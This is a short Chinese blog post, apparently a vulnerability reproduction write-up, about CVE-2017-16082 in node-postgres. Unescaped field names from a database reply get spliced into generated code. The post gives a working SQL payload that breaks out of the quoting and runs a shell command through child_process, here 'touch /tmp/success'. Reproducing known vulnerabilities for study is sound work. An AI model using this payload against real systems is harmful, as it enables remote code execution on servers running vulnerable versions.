Node-postgres 代码执行漏洞 CVE-2017-16082 漏洞复现

Node-postgres 代码执行漏洞(CVE-2017-16082)

by ADummy

0x00利用路线

​ 直接url执行

0x01漏洞介绍

​ node-postgres在处理类型为Row Description的postgres返回包时,将字段名拼接到代码中。由于没有进行合理转义,导致一个特殊构造的字段名可逃逸出代码单引号限制,造成代码执行漏洞。

0x02漏洞复现

那么,我们就可以猜测这里存在node-postgres的代码执行漏洞。编写我想执行的命令touch /tmp/success,然后适当分割(每段长度不超过64字符)后替换在如下payload中:

SELECT 1 AS "\']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`touch /tmp/success`)//"

///注意url编码

在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值